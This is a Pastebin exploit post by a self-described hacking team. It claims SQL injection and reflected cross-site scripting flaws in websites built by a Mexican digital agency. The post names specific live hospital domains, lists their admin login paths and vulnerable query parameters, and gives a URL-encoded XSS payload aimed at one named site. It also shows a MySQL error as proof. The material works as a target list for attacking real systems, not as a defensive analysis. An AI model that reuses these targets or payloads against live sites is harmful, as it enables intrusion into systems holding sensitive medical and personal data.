KingSkrupellos

Mockup Studio Agencia Digital Mexico XSS SQL Injection

Aug 28th, 2019
270
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.91 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Mockup Studio Agencia Digital Mexico XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 29/08/2019
  7. # Vendor Homepage : mockup.mx
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. Mockup Studio Mexico is prone to an SQL-injection vulnerability because it fails to
  24. sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue
  25. could allow an attacker to compromise the application, access or modify data, or exploit
  26. latent vulnerabilities in the underlying database. A remote attacker can send a specially
  27. crafted request to the vulnerable application and execute arbitrary SQL commands in
  28. application`s database. Further exploitation of this vulnerability may result in unauthorized
  29. data manipulation. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. Reflected XSS (or Non-Persistent) :
  32. ***************************************
  33. The server reads data directly from the HTTP
  34. request and reflects it back in the HTTP response. Reflected XSS exploits occur when an
  35. attacker causes a victim to supply dangerous content to a vulnerable web application,
  36. which is then reflected back to the victim and executed by the web browser. The most common
  37. mechanism for delivering malicious content is to include it as a parameter in a URL that is
  38. posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
  39. the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
  40. that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
  41. the content is executed by the victim's browser.
  42.  
  43. ###################################################################
  44.  
  45. # Admin Panel Login Path :
  46. ************************
  47. apps.hospitalsatelite.com:8080/lealtad/login.php
  48. resultados.hospitalsatelite.com/login.aspx
  49. bolsadetrabajo.hospitalsatelite.com/aes.bt.us.web/content/AES.BT.US.WEB.Acceso/Login.aspx
  50.  
  51. # SQL Injection Exploit :
  52. **********************
  53. /template4/index.php?id_clinica=[SQL Injection]
  54.  
  55. /listaestudios3.php?CveServicio=[SQL Injection]
  56.  
  57. /estudios.php?CveServicio1=[ID-NUMBER]&idSeccion=[SQL Injection]
  58.  
  59. # Cross Site Scripting XSS Exploit :
  60. ********************************
  61. /template4/index.php?id_clinica=1%27
  62. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-
  63. Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  64.  
  65. ###################################################################
  66.  
  67. # Example Vulnerable Sites :
  68. *************************
  69. [+] hospitalsatelite.com/template4/index.php?id_clinica=1%27
  70.  
  71. [+] hospitalsatelite.com/template4/index.php?id_clinica=1%27
  72. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-
  73. Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  74.  
  75. ###################################################################
  76.  
  77. # Example SQL Database Error :
  78. ****************************
  79. 1064: You have an error in your SQL syntax; check the manual that corresponds
  80. to your MySQL server version for the right syntax to use near '\' order by orden' at line 1
  81.  
  82. ###################################################################
  83.  
  84. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  85.  
  86. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment